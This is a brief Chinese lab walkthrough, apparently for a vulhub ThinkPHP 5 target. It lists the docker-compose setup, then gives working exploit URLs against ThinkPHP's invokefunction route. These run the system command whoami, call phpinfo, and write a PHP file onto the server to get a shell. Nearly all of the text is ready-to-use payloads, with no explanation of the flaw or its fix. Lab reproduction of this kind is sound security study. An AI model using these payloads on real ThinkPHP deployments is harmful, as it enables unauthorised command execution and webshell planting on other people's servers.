1.环境搭建
vulhub/thinkphp/5-rce
docker-compose up -d
2.访问靶场
远程命令执行:
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami
远程代码执行:
? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1
3.Getshell
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php
方式二: 利用工具
